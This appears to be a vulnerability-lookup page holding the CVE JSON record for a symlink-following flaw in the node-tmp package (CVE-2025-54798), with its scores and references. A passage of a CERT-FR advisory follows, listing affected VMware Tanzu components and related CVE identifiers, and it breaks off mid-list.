CVE-2025-54798 (GCVE-0-2025-54798)
Vulnerability from cvelistv5
- CWE-59 - Improper Link Resolution Before File Access ('Link Following')
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-54798",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-08-07T14:04:19.811342Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-08-07T14:04:24.089Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6"
}
],
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-03T20:06:39.242Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "https://lists.debian.org/debian-lts-announce/2025/08/msg00007.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "node-tmp",
"vendor": "raszi",
"versions": [
{
"status": "affected",
"version": "\u003c 0.2.4"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "tmp is a temporary file and directory creator for node.js. In versions 0.2.3 and below, tmp is vulnerable to an arbitrary temporary file / directory write via symbolic link dir parameter. This is fixed in version 0.2.4."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 2.5,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-59",
"description": "CWE-59: Improper Link Resolution Before File Access (\u0027Link Following\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-08-07T00:04:35.370Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6"
},
{
"name": "https://github.com/raszi/node-tmp/issues/207",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/raszi/node-tmp/issues/207"
},
{
"name": "https://github.com/raszi/node-tmp/commit/188b25e529496e37adaf1a1d9dccb40019a08b1b",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/raszi/node-tmp/commit/188b25e529496e37adaf1a1d9dccb40019a08b1b"
}
],
"source": {
"advisory": "GHSA-52f5-9888-hmc6",
"discovery": "UNKNOWN"
},
"title": "tmp does not restrict arbitrary temporary file / directory write via symbolic link `dir` parameter"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-54798",
"datePublished": "2025-08-07T00:04:35.370Z",
"dateReserved": "2025-07-29T16:50:28.395Z",
"dateUpdated": "2025-11-03T20:06:39.242Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-54798\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-08-07T01:15:26.203\",\"lastModified\":\"2025-11-03T20:19:15.177\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"tmp is a temporary file and directory creator for node.js. In versions 0.2.3 and below, tmp is vulnerable to an arbitrary temporary file / directory write via symbolic link dir parameter. This is fixed in version 0.2.4.\"},{\"lang\":\"es\",\"value\":\"tmp es un creador de archivos y directorios temporales para Node.js. En las versiones 0.2.3 y anteriores, tmp es vulnerable a la escritura arbitraria de archivos o directorios temporales mediante el par\u00e1metro dir de enlace simb\u00f3lico. Esto se solucion\u00f3 en la versi\u00f3n 0.2.4.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N\",\"baseScore\":2.5,\"baseSeverity\":\"LOW\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":1.0,\"impactScore\":1.4},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\",\"baseScore\":5.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":1.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-59\"}]}],\"configurat
ions\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:raszi:tmp:*:*:*:*:*:node.js:*:*\",\"versionEndExcluding\":\"0.2.4\",\"matchCriteriaId\":\"463A9FBD-7DD2-46BD-96B9-0A107149FF94\"}]}]}],\"references\":[{\"url\":\"https://github.com/raszi/node-tmp/commit/188b25e529496e37adaf1a1d9dccb40019a08b1b\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/raszi/node-tmp/issues/207\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Issue Tracking\",\"Patch\"]},{\"url\":\"https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://lists.debian.org/debian-lts-announce/2025/08/msg00007.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://lists.debian.org/debian-lts-announce/2025/08/msg00007.html\"}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2025-11-03T20:06:39.242Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-54798\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-08-07T14:04:19.811342Z\"}}}], \"references\": [{\"url\": \"https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-08-07T14:04:16.546Z\"}}], \"cna\": {\"title\": \"tmp does not restrict arbitrary temporary file / directory write via symbolic link `dir` parameter\", \"source\": {\"advisory\": \"GHSA-52f5-9888-hmc6\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 2.5, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"LOW\", \"vectorString\": \"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"raszi\", \"product\": \"node-tmp\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.2.4\"}]}], \"references\": [{\"url\": \"https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6\", \"name\": \"https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": 
\"https://github.com/raszi/node-tmp/issues/207\", \"name\": \"https://github.com/raszi/node-tmp/issues/207\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/raszi/node-tmp/commit/188b25e529496e37adaf1a1d9dccb40019a08b1b\", \"name\": \"https://github.com/raszi/node-tmp/commit/188b25e529496e37adaf1a1d9dccb40019a08b1b\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"tmp is a temporary file and directory creator for node.js. In versions 0.2.3 and below, tmp is vulnerable to an arbitrary temporary file / directory write via symbolic link dir parameter. This is fixed in version 0.2.4.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-59\", \"description\": \"CWE-59: Improper Link Resolution Before File Access (\u0027Link Following\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-08-07T00:04:35.370Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-54798\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-11-03T20:06:39.242Z\", \"dateReserved\": \"2025-07-29T16:50:28.395Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-08-07T00:04:35.370Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
CERTFR-2025-AVI-0967
Vulnerability from certfr_avis
De multiples vulnérabilités ont été découvertes dans les produits VMware. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
| Vendor | Product | Description |
|---|---|---|
| VMware | Tanzu Platform | File Integrity Monitoring pour VMware Tanzu Platform versions antérieures à 2.1.49 |
| VMware | Tanzu Platform | Cloud Service Broker pour Azure pour VMware Tanzu Platform versions antérieures à 1.13.1 |
| VMware | Tanzu Platform | AI Services pour VMware Tanzu Platform versions antérieures à 10.3.0 |
| VMware | Tanzu Platform | Scheduler pour VMware Tanzu Platform versions antérieures à 2.0.21 |
| VMware | Tanzu Platform | Foundation Core pour VMware Tanzu Platform versions antérieures à 3.1.4 |
| VMware | Tanzu Platform | Elastic Application Runtime pour VMware Tanzu Platform versions antérieures à 10.2.4+LTS-T |
| VMware | Tanzu Platform | Isolation Segmentation pour VMware Tanzu Platform versions antérieures à 6.0.21+LTS-T |
| VMware | Tanzu Platform | .NET Core Buildpack versions antérieures à 2.4.64 |
| VMware | Tanzu Platform | VMware Tanzu Data Flow sur Tanzu Platform versions antérieures à 2.0.0 |
| VMware | Tanzu Platform | Isolation Segmentation pour VMware Tanzu Platform versions antérieures à 10.2.4 |
| VMware | Tanzu Platform | CredHub Secrets Management pour VMware Tanzu Platform versions antérieures à 1.6.7 |
| VMware | Tanzu Platform | Extended App Support pour Tanzu Platform versions antérieures à 1.0.8 |
| VMware | Tanzu Platform | Go Buildpack versions antérieures à 1.10.57 |
| VMware | Tanzu Platform | VMware Tanzu RabbitMQ sur Tanzu Platform versions antérieures à 10.1.0 |
| VMware | Tanzu Platform | NodeJS Buildpack versions antérieures à 1.8.61 |
| VMware | Tanzu Platform | Foundation Core pour VMware Tanzu Platform versions antérieures à 3.2.0 |
| VMware | Tanzu Platform | Application Services pour VMware Tanzu Platform versions antérieures à 3.3.11 |
| VMware | Tanzu Platform | IPsec Encryption pour VMware Tanzu Platform versions antérieures à 1.9.68 |
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "File Integrity Monitoring pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 2.1.49",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Cloud Service Broker pour Azure pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 1.13.1",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "AI Services pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 10.3.0",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Scheduler pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 2.0.21",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Foundation Core pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 3.1.4",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Elastic Application Runtime pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 10.2.4+LTS-T",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Isolation Segmentation pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 6.0.21+LTS-T",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": ".NET Core Buildpack versions ant\u00e9rieures \u00e0 2.4.64",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "VMware Tanzu Data Flow sur Tanzu Platform versions ant\u00e9rieures \u00e0 2.0.0",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Isolation Segmentation pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 10.2.4",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "CredHub Secrets Management pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 1.6.7",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Extended App Support pour Tanzu Platform versions ant\u00e9rieures \u00e0 1.0.8",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Go Buildpack versions ant\u00e9rieures \u00e0 1.10.57",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "VMware Tanzu RabbitMQ sur Tanzu Platform versions ant\u00e9rieures \u00e0 10.1.0",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "NodeJS Buildpack versions ant\u00e9rieures \u00e0 1.8.61",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Foundation Core pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 3.2.0",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Application Services pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 3.3.11",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "IPsec Encryption pour VMware Tanzu Platform versions ant\u00e9rieures \u00e0 1.9.68",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2022-1343",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1343"
},
{
"name": "CVE-2025-8715",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8715"
},
{
"name": "CVE-2025-30681",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30681"
},
{
"name": "CVE-2023-0216",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0216"
},
{
"name": "CVE-2024-20919",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20919"
},
{
"name": "CVE-2022-1473",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1473"
},
{
"name": "CVE-2023-21938",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21938"
},
{
"name": "CVE-2023-40217",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-40217"
},
{
"name": "CVE-2020-14621",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14621"
},
{
"name": "CVE-2023-0401",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0401"
},
{
"name": "CVE-2025-59830",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59830"
},
{
"name": "CVE-2023-21843",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21843"
},
{
"name": "CVE-2024-36138",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36138"
},
{
"name": "CVE-2020-2803",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2803"
},
{
"name": "CVE-2024-21235",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21235"
},
{
"name": "CVE-2025-30689",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30689"
},
{
"name": "CVE-2024-11168",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-11168"
},
{
"name": "CVE-2025-9231",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9231"
},
{
"name": "CVE-2022-21426",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21426"
},
{
"name": "CVE-2024-22020",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22020"
},
{
"name": "CVE-2025-30715",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30715"
},
{
"name": "CVE-2025-30682",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30682"
},
{
"name": "CVE-2021-35586",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35586"
},
{
"name": "CVE-2025-25186",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25186"
},
{
"name": "CVE-2025-50102",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50102"
},
{
"name": "CVE-2025-55248",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55248"
},
{
"name": "CVE-2024-21144",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21144"
},
{
"name": "CVE-2021-35550",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35550"
},
{
"name": "CVE-2025-22872",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22872"
},
{
"name": "CVE-2021-35567",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35567"
},
{
"name": "CVE-2020-14579",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14579"
},
{
"name": "CVE-2025-50100",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50100"
},
{
"name": "CVE-2023-21954",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21954"
},
{
"name": "CVE-2022-4304",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4304"
},
{
"name": "CVE-2023-21939",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21939"
},
{
"name": "CVE-2024-20926",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20926"
},
{
"name": "CVE-2025-0913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0913"
},
{
"name": "CVE-2021-2163",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-2163"
},
{
"name": "CVE-2024-21890",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21890"
},
{
"name": "CVE-2024-21896",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21896"
},
{
"name": "CVE-2025-47907",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47907"
},
{
"name": "CVE-2025-40026",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40026"
},
{
"name": "CVE-2022-1292",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1292"
},
{
"name": "CVE-2024-21068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21068"
},
{
"name": "CVE-2024-7409",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7409"
},
{
"name": "CVE-2025-30703",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30703"
},
{
"name": "CVE-2023-21830",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21830"
},
{
"name": "CVE-2021-2161",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-2161"
},
{
"name": "CVE-2025-6069",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6069"
},
{
"name": "CVE-2021-2341",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-2341"
},
{
"name": "CVE-2024-6232",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6232"
},
{
"name": "CVE-2025-50080",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50080"
},
{
"name": "CVE-2024-6505",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6505"
},
{
"name": "CVE-2025-4330",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4330"
},
{
"name": "CVE-2020-14593",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14593"
},
{
"name": "CVE-2025-50078",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50078"
},
{
"name": "CVE-2020-14664",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14664"
},
{
"name": "CVE-2024-9287",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-9287"
},
{
"name": "CVE-2025-4138",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4138"
},
{
"name": "CVE-2020-14797",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14797"
},
{
"name": "CVE-2023-0215",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0215"
},
{
"name": "CVE-2023-36632",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-36632"
},
{
"name": "CVE-2020-14798",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14798"
},
{
"name": "CVE-2023-0286",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0286"
},
{
"name": "CVE-2024-43484",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43484"
},
{
"name": "CVE-2025-24293",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24293"
},
{
"name": "CVE-2025-30696",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30696"
},
{
"name": "CVE-2025-55752",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55752"
},
{
"name": "CVE-2022-21299",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21299"
},
{
"name": "CVE-2020-2773",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2773"
},
{
"name": "CVE-2024-22025",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22025"
},
{
"name": "CVE-2024-20921",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20921"
},
{
"name": "CVE-2020-14578",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14578"
},
{
"name": "CVE-2025-21584",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21584"
},
{
"name": "CVE-2020-2805",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2805"
},
{
"name": "CVE-2025-58767",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58767"
},
{
"name": "CVE-2023-4807",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4807"
},
{
"name": "CVE-2024-45341",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45341"
},
{
"name": "CVE-2020-2830",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2830"
},
{
"name": "CVE-2025-54798",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-54798"
},
{
"name": "CVE-2022-21624",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21624"
},
{
"name": "CVE-2020-2781",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2781"
},
{
"name": "CVE-2022-21305",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21305"
},
{
"name": "CVE-2020-14556",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14556"
},
{
"name": "CVE-2025-50085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50085"
},
{
"name": "CVE-2020-14792",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14792"
},
{
"name": "CVE-2023-44487",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44487"
},
{
"name": "CVE-2025-41248",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41248"
},
{
"name": "CVE-2024-3447",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3447"
},
{
"name": "CVE-2022-2068",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2068"
},
{
"name": "CVE-2022-21271",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21271"
},
{
"name": "CVE-2025-61919",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61919"
},
{
"name": "CVE-2022-40897",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40897"
},
{
"name": "CVE-2025-0938",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0938"
},
{
"name": "CVE-2025-27210",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27210"
},
{
"name": "CVE-2025-61771",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61771"
},
{
"name": "CVE-2025-61770",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61770"
},
{
"name": "CVE-2023-22081",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22081"
},
{
"name": "CVE-2022-4203",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4203"
},
{
"name": "CVE-2025-50106",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50106"
},
{
"name": "CVE-2023-46809",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-46809"
},
{
"name": "CVE-2024-21510",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21510"
},
{
"name": "CVE-2022-21626",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21626"
},
{
"name": "CVE-2025-58057",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58057"
},
{
"name": "CVE-2025-8291",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8291"
},
{
"name": "CVE-2020-14781",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14781"
},
{
"name": "CVE-2025-30683",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30683"
},
{
"name": "CVE-2025-30699",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30699"
},
{
"name": "CVE-2025-61921",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61921"
},
{
"name": "CVE-2025-22866",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22866"
},
{
"name": "CVE-2025-30754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30754"
},
{
"name": "CVE-2024-38229",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38229"
},
{
"name": "CVE-2025-47910",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47910"
},
{
"name": "CVE-2025-23167",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23167"
},
{
"name": "CVE-2023-27043",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27043"
},
{
"name": "CVE-2024-43483",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43483"
},
{
"name": "CVE-2025-50094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50094"
},
{
"name": "CVE-2021-35559",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35559"
},
{
"name": "CVE-2023-0217",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0217"
},
{
"name": "CVE-2024-58266",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58266"
},
{
"name": "CVE-2025-50098",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50098"
},
{
"name": "CVE-2022-21291",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21291"
},
{
"name": "CVE-2025-50086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50086"
},
{
"name": "CVE-2022-3786",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3786"
},
{
"name": "CVE-2023-38552",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38552"
},
{
"name": "CVE-2021-35565",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35565"
},
{
"name": "CVE-2025-47906",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47906"
},
{
"name": "CVE-2025-58446",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58446"
},
{
"name": "CVE-2025-8194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8194"
},
{
"name": "CVE-2024-3446",
